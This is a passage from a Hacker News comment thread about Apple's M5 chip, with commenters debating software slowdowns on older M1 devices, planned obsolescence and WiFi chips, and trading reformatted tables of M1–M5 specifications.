          6Ghz get stopped by a piece of paper, so the same as 5Ghz except you won't get 6Ghz unless you have haev direct line of sight to the AP.

    • HumblyTossed 20 hours ago

      "stuck".

      An infinitely small percentage of people can take advantage of 320Mhz. It's fine.

      • londons_explore 20 hours ago

        Today. But in 3 years time it'll be widespread and your Mac will be the one with the sluggish WiFi connection that jams up the airwaves for all other devices too.

        • landl0rd 16 hours ago

          It really won't, and there will be a ton of devices "jamming up" the airwaves. In most places the backhaul isn't fast enough for anyone to get any use for 320MHz channels beyond maybe very large LAN file transfers which are for some reason happening over WiFi?

          • fragmede 15 hours ago

            Thankfully, there has been nothing new to use computers for since 2022. Definitely no new technology that involves downloading different 10+ Gib large files to test with, and users couldn't possibly conceive of a NAS, nevermind owning one because Netflix has never removed shows while people are watching them, breaking an assumed promise by users. ISP speeds are never ever going to improve either. Everyone knows that!

        • shwaj 17 hours ago

          How does it “jam up the airwaves” if its operating at a different frequency than the devices you say it will be jamming?

    • Avamander 15 hours ago

      Channel width is not the only thing that determines the usability or quality of a chipset though.

      Reducing Broadcom's influence over the WiFi ecosystem alone would be a large benefit.

    • t-3 20 hours ago

      I doubt the number of people in both "has no neighbors" and "owns Apple hardware" camps are significant at all.

    • MrBuddyCasino 19 hours ago

      I don’t think 4096 QAM is realistic anyway, except if your router is 10 cm away from your laptop.

  • fx1994 2 hours ago

    That's why I did not upgrade :) I upgraded VM and when I saw how slow it was, it was a no no for my M2...

  • Insanity 20 hours ago

    Yeah I love my M1 iPad Pro. But the "liquid glass" update made it feel slower. Really only the 'unlock' feels slower, once I'm using it it's fine. But it's slightly annoying and does make me want to update this year to the m5.

    But it's a glorified Kindle and YouTube box, so I'm hesitating a little bit.

    • asimovDev 19 hours ago

      my dad's got a pre AS iPad Pro and it's so bad after updating to 26. My 6th gen iPad on iOS 17 felt faster than this

      • baq 14 hours ago

        I have a 5th gen? Can’t even remember now it’s so old. Nothing works anymore except Netflix, YouTube and Disney, and that only after a minute or so.

        Which is fine, since it’s exclusively used to watch a kids show for a half an hour a day.

        …but it’s also super sad to see a once fantastic piece of kit to degrade so much primarily due to software.

    • knowitnone3 18 hours ago

      "make me want to update this year to the m5." Then Apple software devs did what they were told

  • dawnerd 19 hours ago

    I’m still daily driving my M1 Max and have no reason to upgrade for a long time. There’s really nothing in my workflow that could be markedly improved performance wise. There’s only thing is maybe more ram as the need for that keeps growing - I’m isn’t just under 30 when running a bunch of containers.

  • lelandfe 20 hours ago

    As a UI/UX nerd, it’s a coin flip on intentionality. I’ve been noticing so many rough edges to Apple’s software when it used to astound. iOS Settings search will flash “No Results” as you begin to type which is comically amateurish. The macOS menu bar control panels can’t be keyboard navigated... It’s just silly.

    I’ve been debating making a Tumblr-style blog, something like “dumbapple.com,” to catalogue all the dumb crap I notice.

    • vessenes 19 hours ago

      Liquid Glass feels rushed to me. Tons of UI annoyances especially on iPhone - it's suddenly many clicks to get to prior calls for instance, a core way I call people. I'm imagining it will get ironed out over the next two years.

      • bombcar 15 hours ago

        It really does. It’s a two-year update and hey should have had two teams - one for Liquid Glass working for the next release, and one doing a Snow Leopard-type cleanup for this year. Let the Mac and iPhone be a bit out of sync if needed.

    • hn111 3 hours ago

      I’ve been having the same idea for a while. I think it would be a great way to let them prioritize the stability a bit more by publicly displaying how shamefully the UI behaves.

      Interested in collaborating on this? Perhaps a simple open-source static blog built with Astro?

    • jerf 18 hours ago

      "iOS Settings search will flash “No Results” as you begin to type which is comically amateurish."

      I'd love to agree that comically amateurish, but apparently there's something about settings dialogs that make them incredibly difficult to search. It takes Android several seconds to search its settings, and the Microsoft start menu is also comically slow if you try to access control panels through it, although it's just comically slow at search in general. Even Brave here visibly chokes for like 200ms if I search in its preferences dialog... which compared to Android or Windows is instant but still strikes me as a bit to the slow side considering the small space of things being searched. Although it looks like it may be more related to layout than actual searching.

      Still. I dunno why but a lot of settings searches are mind-bogglingly slow.

      (The only thing I can guess at is that the search is done by essentially fully instantiating the widgets for all screens and doing a full layout pass and extracting the text from them and frankly that's still not really accounting for enough time for these things. Maybe the Android search is blocked until the Storage tab is done crawling over the storage to generate the graphs that are not even going to be rendered? That's about what it would take to match the slowdown I see... but then the Storage tab happily renders almost instantly before that crawl is done and updates later... I dunno.)

      • vizzier 17 hours ago

        Might have to be more specific than Android and Windows. Tried them on my devices (S24, windows 11) and they're practically instantaneous.

      • robenkleene 17 hours ago

        The parent isn't commenting about the speed of search, just that saying "No Results", when they really mean "we're still checking for results" is bad UI (which I agree with).

        • array_key_first 13 hours ago

          The speed is bad too. At least on Android, it does actually take 5-10 seconds sometimes. That's not an exaggeration.

          It should be searching, what, a few hundred strings? What is it doing? Is it making a network call? For what?

          Anyway, barely related, but it does bring into question the quality of modern software.

        • fodkodrasz 16 hours ago

          It is possibly Null value pattern in action, which is a good thing in my opinion (as in robust), though its display this way is a bit suboptimal.

          Funny I'm defending them, but I think this is not even a papercut in my opinion, while they have far bigger issues.

          • fragmede 14 hours ago

            I'm sure this is me seeing the past through rose-colored glasses, but the reason bits of visual pollution like that is particularly annoying is Apple shit used to be so exceptionally polished. Not sure what emotion I want to project on them as to why they're like that now (or if it's even actually true), but it's the perception that if they're no longer getting the little stuff like that polished anymore, what else just isn't being done to the same high standard?

            • NetMageSCW 13 hours ago

              Lots of things. iOS has never implemented the iPod USB interface properly and whoever thought listing music alphabetically was a good default should be fired.

      • SoKamil 17 hours ago

        The old System Preferences search was lightning fast compared to current SwiftUI System Settings on macOS.

    • jtbayly 19 hours ago

      Please do this. Here are some examples to add to your list, leaving out the 26.0 bugs that I've come to expect running a .0 release.

      1. I won't focus on a bunch of Siri items, but one example that always bugs me: I cannot ask Siri to give me directions to my next meeting. The latest OS introduces an answer for the first time, though. It tells me to open the calendar app on my Apple watch, and tap on the meeting, and tap the address. (I don't have an Apple watch.)

      2. Mail.app on iOS does not have a "share sheet." This makes it impossible to "do" anything with an email message, like send it to a todo app. (The same problem exists with messages in Messages.app)

      3. It is impossible to share a contact card from Messages.app (both iOS and MacOS). You have to leave messages, go to contacts and select the contact to share. Contacts should be one of the apps that shows up in the "+" list like photos, camera, cash, and plenty third party apps.

      4. You still have to set the default system mail app in MacOS as a setting in the Mail.app, instead of in system settings. Last I checked, I'm pretty sure you couldn't do this, without first setting up an account in the Mail.app. Infuriating.

      • grincho 17 hours ago

        I had that complaint about Mail too. Then I realized you can begin dragging an email (from the list view), switch apps with your other hand, and drop it into, say, a todo. Of course, this is less discoverable, so I agree a Share button would not go amiss.

        • jtbayly 8 hours ago

          Wow. I didn’t even know it was possible to drag and drop between apps on iOS. TIL. Thanks!

    • butlike 20 hours ago

      iirc, there's a setting to make the menu bar navigatable. you just need to "alt+tab" to it with some weird button combo, like Ctrl + Cmd + 1 or something.

      • lelandfe 19 hours ago

        You can turn on "Full Keyboard Access," which paints a hideous rectangle around anything you focus but does allow keyboard access to everything.

        But, like, man - why can't I just use the arrow keys to select my WiFi network anymore? I was able to for a decade.

        And the answer, of course, is the same for so much of macOS' present rough edges. Apple took some iPadOS interface elements, rammed them into the macOS UI, and still have yet to sand the welds. For how much we complain on HN about Electron, we really need to be pissed about Catalyst/Marzipan.

        Why does the iCloud sign in field have me type on the right side of an input? Why does that field have an iPadOS cursor? Why can't I use Esc to close its help sheet? Why aren't that sheet's buttons focusable?

        Why does the Stocks app have a Done button appear when I focus its search field? Why does its focus ring lag behind the search field's animated size?

        Where in the HIG does it sign off on unfocusable text-only bolded buttons, like Maps uses? https://imgur.com/a/e7PB5jm

        ...Anyway.

  • seunosewa 17 hours ago

    My M1 Air got very sluggish after upgrading to Tahoe but then it started behaving normally after a couple of days. Hopefully, you'll experience the same soon.

    • raspasov an hour ago

      Probably building a spotlight index or something of that sort.

  • dimal 14 hours ago

    Seems like the software teams are there to simply squander the extra processing power that the hardware teams provide, thus ensuring recurring revenue. I see no good reason to upgrade to Tahoe. I’d have to buy a new computer just so I could power transparencies that I don’t want.

    • bsimpson 14 hours ago

      This feels like it's always been true.

      Devices get slower for no perceivable reason, when in reality software at all levels makes higher assumptions about how much power you have, and squanders it more readily.

  • JumpCrisscross 17 hours ago

    > Tahoe however makes my M1 Air feel sluggish

    Counterpoint: my M1 Pro was a turtle for a few weeks and then stopped doing nonsense in the background and is back to its zippy self. (Still buggy. But that would be true on new hardware, too.)

    • quadyeast 16 hours ago

      mediaanalysisd has been consuming ~140% CPU since upgrading a few weeks ago. I just turned off Apple Intelligence and it dropped to 0%.

  • butlike 20 hours ago

    I think it's probably a play to get you to upgrade for the new GPU computational power. I _do_ think that what we're seeing (and marketed as AI) will be the future, but I don't think it will look like what we're seeing now. Whatever that future holds will require the upgraded capabilities of these new GPU architectures, and this being a reason for the subtle nudge to upgrade from Apple makes sense to me.

    It feels very much like how I imagine someone living in the late 1800's might have felt. The advent of electricity, the advent of cars, but can't predict airplanes, even though they're right around the corner and they'll have likely seen them in their lifetime.

  • throw0101d 9 hours ago

    > The M5 MacBook Pro still gets the Broadcom WiFi chip but the M5 iPad Pros get the N1 and C1X (Sweet).

    I think many IT departments will be thankful for that as Wifi behaviour can be challenging and hopefully will lower ticket counts.

  • jbverschoor 3 hours ago

    >> Tahoe however makes my M1 Air feel sluggish doing the exact same tasks ive been last couple of years

    Quit the Dropbox app, it’s electron, and it’s brand spanking new

  • nixpulvis 11 hours ago

    I would be soo excited if apple split out the hardware and software orgs and moved to make hardware more standardized with macos/ios/etc being just one consumer.

    Not going to happen, but I can dream.

  • sharts 5 hours ago

    The reason for better hardware is so software can lag more.

  • pantalaimon 20 hours ago

    Won't that make Linux support even harder :/

  • DecentShoes 14 hours ago

    They always release a slowdown update to destroy their older hardware. I don't know why you're even questioning it

    • red369 11 hours ago

      I agree with your feeling that about Apple devices eventually getting updates to the point they becomes sluggish. I have just reached that point with iOS 26 and my iPhone 13 mini.

      I am undecided in my thoughts about how malicious this is. Do people think that it is something like wanting to cram more features into the operating systems, and they are careless how it affects the earliest supported models? Or do most people think it is planned obsolescence?

      Apple generally offer updates longer than Android, so is it more pronounced on iPhones than Android phones? I remember seeing similar slow-downs on Android phones in the past.

      Apple generally offer updates for iOS for less time than Windows. I don't really have a feel for the difference between the two in terms of how much new versions slow down older hardware.

      Obviously separating feature updates and security updates would be a way to address, and it's not possible that no one at Apple has considered that idea. They are a business and selling new products is unfortunately a disincentive pushing them away from doing that.

      • rester324 9 hours ago

        Apple was fined all over the world for intentional malicious software slowdown by different courts in many countries. Just google "batterygate". At this point this a proven fact that apple had been doing this. I am pretty sure they continue to do so. Why would they stop?

        • tiltowait 8 hours ago

          The slowdown occurs on systems that can't hold sufficient charge to reliably power the CPU to full anymore. If the battery can't supply the expected voltage, then the system simply shuts off. That is much worse than slowing down. This feature inarguably increased longevity—hardly what I'd expect from a "planned obsolescence" scheme.

          They did make a mistake, though: they should have been up-front about it. They should have advertised it rather than hiding it away.

    • 0xWTF 6 hours ago

      Meanwhile Ubuntu is still snappy on my original 2012 rMBP. It got a new screen, two new batteries, still has the last supported version of macOS installed if I want it. Still sparks joy. If only my fingers could keep the Ubuntu cmd and ctrl key functions properly mapped.

  • WhitneyLand 19 hours ago

    “nobody really needs to upgrade that for most things”

    Maybe, but for lots of scenarios even M5 could still benefit from being an order of magnitude faster.

    AI, dev, some content scenarios, etc…

  • lawlessone 17 hours ago

    >The M1 itself is so powerful that nobody really needs to upgrade that for most things most people do on their computers

    a rant on my part, but a computer from 10 years ago would be fine for what most people do on their computer, only for software bloat..

  • random3 17 hours ago

    This needs benchmarks.

    Sad if true. I feel my M1 max sluggish too lately. After bragging that this was the longest lived work machine I had and thinking I'm good to wait for M6. This is not good for business, but IMO you need more than raw power to justify upgrades even for professional use - form factor, screen quality, battery, etc.

    I think they bet a lot of hardware money on AI capabilities, but failed to deliver the software, so there was no real reason to upgrade because of AI features in the chip (which is literally what they boast on the first line of the announcement - yet nobody cares about making more cute faces)

    It's not 100% their fault. Everyone got onto the LLM bandwagon like it's "the thing" so even if they didn't believe it they sill needed something. Except an OS is not a chat interface, and LLMs do suck at stricter things.

  • antipaul 17 hours ago

    Which is harder these days, software or hardware?

    • DSingularity 16 hours ago

      Each challenging in their own ways. The real challenge is that we need codesign and that’s the tricky part.

  • phamduongtria 16 hours ago

    Even the M4 Max MacBook, I tried in the stores were running like shit on Tahoe

  • thenaturalist 18 hours ago

    Don't kidd yourself: Planned obsolescence is real.

    Apple has a higher duty to their shareholders than to their customers.

    Not hating on Apple, just stating the hard economic truth.

    • NetMageSCW 13 hours ago

      Nope, never been real, never will be real. Just conspiracy theories like all the others.

      PS The Earth isn’t flat. We did go to the Moon. Vaccines don’t cause autism.

      • otikik 2 hours ago

        Planed obsolescence is not a conspiracy. Apple specifically has been proven to sneakily add "silently slow down the hardware" to their updates. But there's examples of planned obsolescence abound.

      • thenaturalist 16 minutes ago

        Yes, it's real and it's plain funny that you discredit simple facts in a case as obvious and with as many data points as Apple.

        From the 2005 iPods settlement [0], to the 113 Mio USD Batterygate [1], to Flexgate [2] where Apple only escaped settlement due to plausible deniability.

        To quote from Batterygate:

        > Apple has agreed to pay millions of dollars to 34 states over its controversial previous practice of deliberately slowing down older iPhones to extend their battery life.

        > [...]

        > Many believed it was an effort to encourage users to buy new iPhones.

        I agree on all your "PS" points, where we seem to differ is that reading is a virtue and not knowing something because you haven't heard of it doesn't constitute a conspiracy theory.

        0: https://www.cbsnews.com/news/ipod-class-action-suit-settled/

        1: https://edition.cnn.com/2020/11/19/tech/apple-battery-settle...

        2: https://www.macrumors.com/2021/07/20/flexgate-class-action-l...

  • imcritic 20 hours ago

    [flagged]

    • mumber_typhoon 20 hours ago

      What I have seen with iPhones is that the ram has gone from 4gb to 12gb very quickly compared to how it went from 1gb to 3gb.

      Apps used to use less ram but over the years apps have become big and more complicated. This is probably why iPhones feel sluggish because new iPhones have more memory and apps snap back faster as newer iPhones which also have faster storage and memory bandwidth to reduce latency of reading more data from the flash.

      Batteries are also a problem as maintaining voltage is difficult for a 2-3 year old battery. An official battery swap at apple service for a 3 year old iPhone will make it run much better.

      I used to believe (and sometimes I still do) that apple intentionally makes everything heavier to make old phones and devices feel slower but I don't think thats the case.

      I think that more things are happening on newer phones and devices and that same task feels slower on older device. This happens are lot faster on iPhones and phones in general (a year or two) as opposed to Macs/computers which can show signs of aging in 4-5 years.

      My 2018 intel computer feels very slow in 2025 running Gnome. No one slowed it down. It's just that the 2025 world of software is a lot heavier and 2026 will be even more and so on.

      • bloppe 20 hours ago

        Apple has been proven to intentionally slow down older devices, but it's definitely not to inflate their profits. It's just a way to kindly preserve your old battery for you. And they try to keep it a secret from you so you don't get confused.

        • rsynnott 19 hours ago

          … Eh? It was neither. It was due to a design defect in a particular model; if voltage fell into a range that was perfectly possible with an aging but still functional battery, the SoC would shut off. The only viable software fix was to clock it down instead (there was an option to decline that and risk the abrupt shutoffs).

          Not really sure what else they could have done there.

          • bloppe 19 hours ago

            It's not a particular model. It's every model. And it's just interesting that no other manufacturer seems to have the same problem. iPhones are just too advanced, I suppose.

      • HumblyTossed 20 hours ago

        Apps are heavier because a lot of them do not use native code. It's all cross platform BS. And they include a lot of A/B code as well. Really wish Apple would nip that all in the bud.

    • the_other 20 hours ago

      My iPhone X worked fine for 7 years, even without a battery replacement. It still works just fine. I wanted a larger screen and better zoom lens, so I upgraded earlier this year but I absolutely didn't have to and didn't feel any pressure from Apple to do so.

      n=1.

    • alimbada 20 hours ago

      I've been using an iPhone 11 for 4 years now (also, reminder: the 11 was launched 2 years prior to when I bought mine). I replaced the battery earlier this year as it wouldn't last to the end of the day any more but besides that it's showing no slowdowns or any other issues.

      • bombcar 20 hours ago

        Do you have iOS 26 on it? That pigdog is making my 15 Pro Max sweat and cry.

        • icedchai 20 hours ago

          I have an iPhone 13 and haven't upgraded yet. Sounds like I should hold off.

          • criddell 20 hours ago

            I have an iPhone 13 Mini and upgraded is iOS 26 and it seems fine to me.

            I also have a 2018 iPad Pro and put iPadOS 26 on it and I haven't had any issues on it either except sometimes my keyboard is slow to connect. I'm not sure if it's the software or hardware though.

          • bombcar 20 hours ago

            I haven't really found anything that blew my socks off, and the number of "strange bugs" (not even talking about the UI complaints, just things like "touch stops working suddenly" and other weird things) is too damn high.

            • icedchai 19 hours ago

              I'll probably wait for 26.1 then!

        • alimbada 20 hours ago

          I only just upgraded to iOS 18 recently. I'm unlikely to go to 26 unless there's a good reason to do so.

        • rsynnott 19 hours ago

          Never, ever, upgrade to any Apple OS until at least .1. .0 is _always_ broken.

        • chasd00 19 hours ago

          i don't see what the big deal is with iOS 26. it looks a little bit different, everything now seems to have some degree of transparency but everything works the same.

    • tempoponet 19 hours ago

      They support their phones for years longer than any vendor. This has been widely understood for probably 10+ years at this point.

      There's plenty of room for criticism without a blanket conspiracy that doesn't match what most can observe.

    • endemic 20 hours ago

      No more than any other company.

  • wartywhoa23 15 hours ago

    > ...The <thing I own right now> is so powerful that nobody really needs to upgrade...

    I keep hearing this since the Intel 486DX times, and

    > Nobody will ever need more than 640K of RAM!

    • bombcar 15 hours ago

      This is the first time I’ve gone four+ years without even a real desire to upgrade, I have a hard time figuring out even what would be faster.

      Amusingly enough, adding more ports could do it.

  • rester324 9 hours ago

    If Tahoe made M1 slower then I am sure it was intentional. Apple had done this in the past and been fined for hundreds of millions in different courts all over the world. So I am pretty sure they continue slowing software down intentionally on older hardware. You can google "batterygate" and you can see for yourself

hereme888 16 hours ago

Base models only:

- M1 | 5 nm | 8 (4P+4E) | GPU 7–8 | 16-core Neural | Memory Bandwidth: 68.25 GB/s | Unified Memory: 16 GB | Geekbench6 ~2346 / 8346

- M2 | 5 nm (G2) | 8 (4P+4E) | GPU 8–10 | 16-core Neural | Memory Bandwidth: 100 GB/s | Unified Memory: 24 GB | Geekbench6 ~2586 / 9672

- M3 | 3 nm (first-gen) | 8 (4P+4E) | GPU 8–10 | 16-core Neural | Memory Bandwidth: 100 GB/s | Unified Memory: 24 GB | Geekbench6 ~2965 / 11565

- M4 | 3 nm (second-gen) | 10 (4P+6E) | GPU 8–10 | 16-core Neural | Memory Bandwidth: 120 GB/s | Unified Memory: 32 GB | Geekbench6 ~3822 / 15031

- M5 | 3 nm (third-gen) | 10 (4P+6E) | GPU 10 | 16-core Neural | Memory Bandwidth: 153 GB/s | Unified Memory: up to 32 GB | Geekbench6 ~4133 / 15,437 (9-core sample)

  • runjake 14 hours ago

    Let's see if I can turn this into an ASCII table and have it survive HN's reformatting.

        +------+------------------+--------------+----------+----------------+-------------------+-------------------+---------------------------+
        | Chip | Process          | CPU Cores    | GPU      | Neural Engine  | Memory Bandwidth  | Unified Memory    | Geekbench6 (Single/Multi) |
        +------+------------------+--------------+----------+----------------+-------------------+-------------------+---------------------------+
        | M1   | 5 nm             | 8 (4P+4E)    | 7–8      | 16-core Neural | 68.25 GB/s        | 16 GB             | ~2346 / 8346              |
        | M2   | 5 nm (G2)        | 8 (4P+4E)    | 8–10     | 16-core Neural | 100 GB/s          | 24 GB             | ~2586 / 9672              |
        | M3   | 3 nm (first-gen) | 8 (4P+4E)    | 8–10     | 16-core Neural | 100 GB/s          | 24 GB             | ~2965 / 11565             |
        | M4   | 3 nm (second-gen)| 10 (4P+6E)   | 8–10     | 16-core Neural | 120 GB/s          | 32 GB             | ~3822 / 15031             |
        | M5   | 3 nm (third-gen) | 10 (4P+6E)   | 10       | 16-core Neural | 153 GB/s          | up to 32 GB       | ~4133 / 15437 (9-core)    |
        +------+------------------+--------------+----------+----------------+-------------------+-------------------+---------------------------+
    • jacobolus 12 hours ago

      Or to fit in a narrower window:

        Chip | Process | CPU       | GPU  | Neural  | Memory      | Unified | Geekbench6
             |         | Cores     |      | Engine  | Bandwidth   | Memory  | Single / Multi 
        -----|---------|-----------|------|---------|-------------|---------|----------------------
        M1   | 5 nm G1 |  8: 4P+4E | 7–8  | 16-core |  68.25 GB/s |  16 GB  | 2346 / 8346          
        M2   | 5 nm G2 |  8: 4P+4E | 8–10 | 16-core | 100    GB/s |  24 GB  | 2586 / 9672          
        M3   | 3 nm G1 |  8: 4P+4E | 8–10 | 16-core | 100    GB/s |  24 GB  | 2965 / 11565         
        M4   | 3 nm G2 | 10: 4P+6E | 8–10 | 16-core | 120    GB/s |  32 GB  | 3822 / 15031         
        M5   | 3 nm G3 | 10: 4P+6E | 10   | 16-core | 153    GB/s | ≤32 GB  | 4133 / 15437 (9 core)
      • thenberlin 7 hours ago

        This is somehow the most Hacker News thread I've ever seen and I love it.

        • bbor 5 hours ago

          It's perfectly HackerNews, I agree -- any other forum would have native support for Markdown, which solves this problem much more cleanly!

          Maybe they'll finally turn it on for Markdown's 25th anniversary in a few years? A man can dream...

          • d0ugal 21 minutes ago

            For one day only every 25 years.

      • momojo 10 hours ago

        doing the lords work

      • geuis 7 hours ago

        Needs to be even more narrow. (iPhone 16pro landscape Safari).

      • someothherguyy 6 hours ago

        to make it more narrow, place the redundant units in the header

        • vietvu 6 hours ago

          and replace first, second... with 1st, 2nd...

      • tpowell 7 hours ago

        Can I get YoY % improvements to the geekbench scores in another column I double-dog dare you

    • kjkjadksj 8 hours ago

      Looks brutal on mobile

  • nu11ptr 15 hours ago

    The step down from 32GB to 24GB of unified memory is interesting. Theories? Perhaps they decided M4 allowed too much memory in the standard chip and they want to create a larger differential with Pro/Max chips?

    Update: I am thinking the 24GB for M5 is a typo. I see on Apple's site the 14 inch MBP can be configured optionally with 32GB of RAM.

    • makeramen 15 hours ago

      That seems like a typo or incorrect info, the M5 MBP definitely can be configured up to 32 GB, and the Apple page mentions 32 GB explicitly as well.

    • candeira 5 hours ago

      I could be wrong about this but, if I had a guess, I'd say the 24GB M5 chips/systems exist due to binning.

      Apple is designing and manufacturing a chip/chipset/system with 32GB with integrated memory. During QA, parts that have one non-conformant 8GB internal module out of the four are reused in a cheaper (but still functional) 24GB product line rather than thrown away.

      Market segmentation also has its hand in how the final products are priced and sold, but my strong guess is that, if Apple could produce 32GB systems with perfect yield, they would, and the 24GB system would not exist.

      • angoragoats 5 hours ago

        The memory is not on-die, it’s separate (completely standard) memory chips, either DDR4 or DDR5 depending on which M-series CPU you’re looking at. So binning doesn’t really apply.

        • candeira 2 hours ago

          Seems like there's a misunderstanding on my part here. <reads more>

          Ah, the memory is integrated in the same package (the "chip" that gets soldered onto the motherboard) as the integrated CPU/GPU, and I had understood that correctly. However, I had incorrectly surmised that it was built into the same silicon die.

          Thanks for the correction!

          Lesson: TIL about the difference between System-In-a-Package (SIP) and System-On-a-Chip, and how I had misunderstood the Apple Silicon M series processors to be SoCs when they're SiPs.

    • eftychis 15 hours ago

      I had the same question, but I can only speculate at the moment. The cynical part of me thinks in a similar line: create an artificial differentiation and push people to upgrade.

      If anyone has any real clues that they can share pseudonymously, that would be great. Not sure which department drove that change.

      • brailsafe 13 hours ago

        They definitely do that. You could get 64gb ram without going up to the top spec of the Max tier of CPU in the M1 and M2 generations, but with the M4 Pro you can only do 24 or 48gb, while on the lower spec M4 Max you can only do 36gb and nothing else, only the absolute best CPU can do 64, therefore if you were otherwise going to get the 48gb m4 pro, you'd have to spend another ~$1200 USD to get another 16gb of ram if all you cared about was ram.

        There may be a technical explanation for it, but incentives are incentives.

        • matt-p 10 hours ago

          you can get 64GB on the mini with M4-Pro so that lays credence to no technical reason, but at the same time if the business reason was strong, why allow it on the mini but not in a macbook? I think this is equally likely to be due to reducing SKUs or something. E.g they found that most people buying 64GB ram do also buy the upgraded processor.

    • christkv 15 hours ago

      the still have an option for 32GB

    • surcap526 14 hours ago

      Apple is running planned obsolescence scam.

      • umanwizard 13 hours ago

        M1 MBPs are still great laptops. In fact there are even Intel models from 2019 that are still officially supported. Apple is pretty much the last company it makes sense to accuse of planning obsolescence.

        • mschuster91 13 hours ago

          Yup, but only on the hardware side. On the software side, you are entirely at their mercy - unlike Windows which goes to utterly ridiculous length to keep software dating back to the Windows 95 era running on top notch Windows 11 systems, Mac developers are all too used of having to constantly keep up with whatever crap Apple has changed and moved around this time.

          • ben_w 13 hours ago

            I've tried running old Civ2 on a recent windows machine, no dice.

            I'm sure it's possible to do that, but the backwards compatibility on Windows is definitely not as good as you say.

            That said, I'm also currently, as a fun personal project, converting a game originally intended to work on 68k Macs and which still has parts explicitly labelled as for resource forks, and I've lived through (and done work on) 68k, PPC, Intel, and M-series hardware, plus all the software changes, so I agree with you about Apple.

            • Uvix 6 hours ago

              Civ2 was 16-bit... did you try running it on 32-bit Windows 10, or only on 64-bit?

            • chj 12 hours ago

              I think there is a x64 patch you need to apply

            • platevoltage 7 hours ago

              This gave me a flashback of me as a kid messing around with the "resource fork" of Mac applications. I felt like a major hackerman back then. During the era of "free" dialup ISPs, I would effectively remove the giant ad banners they all had.

          • tgma 13 hours ago

            Windows, huh?

            Pulled shenanigans wrt TPM requirements for Windows 10 and 11. Actively trying to make sure people login to a Microsoft Account and making it hard to use Local Accounts.

            > Mac developers are all too used of having to constantly keep up with whatever crap Apple has changed and moved around this time.

            Mmm...

              Win16 API
              Win32 API (including variants like GoodLuckSystemCallExExEx2W(...))
              MFC
              ATL
              .NET WinForms
              .NET Avalon/WPF
              Silverlight
              MAUI
              ...
            • cyberax 11 hours ago

              The thing is, MFC/ATL are _still_ supported. With the last release in October, 2024. And the Win32 API is so stable that people are joking that it's the only stable API on Linux.

              .NET technologies... Yeah, MS dropped the ball there.

            • mschuster91 13 hours ago

              For what it's worth I'm running Mac mostly, outside of ham radio stuff because there's just so much stuff that only is available on Windows.

              The thing with all the mentioned APIs is that, excluding 16 bit stuff (that got yeeted in Win7 x64, but if you did need it you could run W7 x32), you can still run software using them without too much of a hassle and you most probably can compile it if you need to fix a bug.

              Good luck trying to get a Mac game from the 90s running on any Mac natively without an emulator/VM in contrast.

              • varispeed 12 hours ago

                Yup. I was amazed that I could still run software I wrote as a teenager decades ago and it just worked.

          • firecall 9 hours ago

            Is there an argument that, in actuality, this has been to their detriment?

            I'm just asking the question.. ;-)

          • trollbridge 11 hours ago

            What are you talking about? macOS 26 still runs on 2019 x86 Macs.

            • distalx 3 hours ago

              It does feel like planned obsolescence when companies like Apple limit software support for older hardware, Ubuntu run smoothly on much older devices. They could certainly do better by extending support and focusing on sustainability.

          • umanwizard 12 hours ago

            That doesn't really have anything to do with planned obsolescence. Causing churn for developers is not intended to make people buy more Macs before they should need to, which is what planned obsolescence means.

            • heavyset_go 7 hours ago

              The churn means software eventually stops working on whatever macOS version your hardware EOL'd on. For example, builds of Firefox and Chrome deprecate older macOS APIs, therefore they can't run on older versions of macOS. This eventually happens for everything, including Homebrew.

            • mschuster91 12 hours ago

              A piece of software I got in 1995 (Earth Siege) is reasonably playable on a modern PC, no VM, no emulator, it just works (albeit with requiring compatibility mode).

              No piece of Mac software anyone has bought in the late PPC Mac era can even run (!) at all natively on a modern Mac, and even early Intel Mac software will not run on the last Intel generation ever since macOS dropped 32-bit support in userspace entirely. You need to pay the developers for a new version, that's obsolescence by definition and particularly I'm still pissed about the 32 bit removal as that also killed off WINE running 32 bit apps which, you can probably guess, include many games that never got a 64-bit Windows binary because they were developed long before Windows x64 became mainstream (or into existence).

              I do love Apple for high quality hardware, but I'll stick the finger to them till the day I die for killing off WINE during the Intel era for no good reason at all.

              • umanwizard 12 hours ago

                I understand all that. Nevertheless, it has nothing to do with planned obsolescence.

                > You need to pay the developers for a new version, that's obsolescence by definition

                Sure, but you don't have to pay Apple.

                The entire point of the idea of planned obsolescence is companies intentionally making their products last less time than they should, so you have to pay that company more money.

                This is a company making it so you might have to pay other companies more money, because backwards compatibility isn't a priority for them. You can be annoyed by that, sure, but it is not the same thing, and is not obviously corrupt like planned obsolescence is.

  • gigatexal 16 hours ago

    Amazing. My M3Max is going to look like a paper-weight very soon. And that's fine by me. When I get an M6 or M7Max to replace it it'll be amazing.

    • bombcar 15 hours ago

      I’m trying to find any reason I can that my M1 Max needs replacement; it’s hard. How do you justify it?

      • djtriptych 15 hours ago

        Same. I have an M1 Max Studio and it's just laughing at the little workloads I throw at it (pro photo editing, music production, software dev, generally all at the same time).

        It just never sweats AT ALL - it feels like a decade from obsolescence based on what I'm doing now.

        It would have to be an order of magnitude faster for me to even notice at this point.

        • zahirbmirza 15 hours ago

          Obsolescence for Macs comes when Apple decides not to allow your mac update the OS to the latest one.

          • culi 7 hours ago

            then you turn it into a hackintosh or install linux on the machine instead (Asahi Linux is looking pretty good for silicon)

          • phony-account 15 hours ago

            > Obsolescence for Macs comes when Apple decides not to allow your mac update the OS to the latest one.

            That doesn’t make it obsolete, at all.

            • badc0ffee 14 hours ago

              When they stop releasing security patches for that OS version 2 years later, it becomes more risky to connect the thing to a network. Or take in any data from the outside, really, whether it's via Bluetooth, or USB drive.

              And then there's 3rd party software that will stop supporting that old OS version, in part because Apple's dev tools make that difficult.

              Eventually, Apple's own services will stop supporting that OS - no convenient iCloud support.

              Finally, the root CA certs bundled with the OS will become too out of date to use.

              I'm planning on putting Linux on my Intel Mac Mini soon. But when a M3+ Mini goes out of support, will we have that option?

              • illusive4080 12 hours ago

                Even my 2017 MBP on macOS 13 still gets security updates. Heck iPhone 6 got a security update recently.

                Your points are valid but it’s not 2 years, it’s more than that for big vulnerabilities.

                • badc0ffee 11 hours ago

                  > Even my 2017 MBP on macOS 13 still gets security updates.

                  Has it had one since macOS 26 came out? They usually do 2 versions behind - in the summer, that was macOS 13, but now it's macOS 14.

              • unilynx 14 hours ago

                Don't forget about Bootcamp for the (soon) obsolete Intels .

                With a debloated Windows 10 (which we're not going to connect to the internet anyway) they can live on for older games.

            • jkestner 14 hours ago

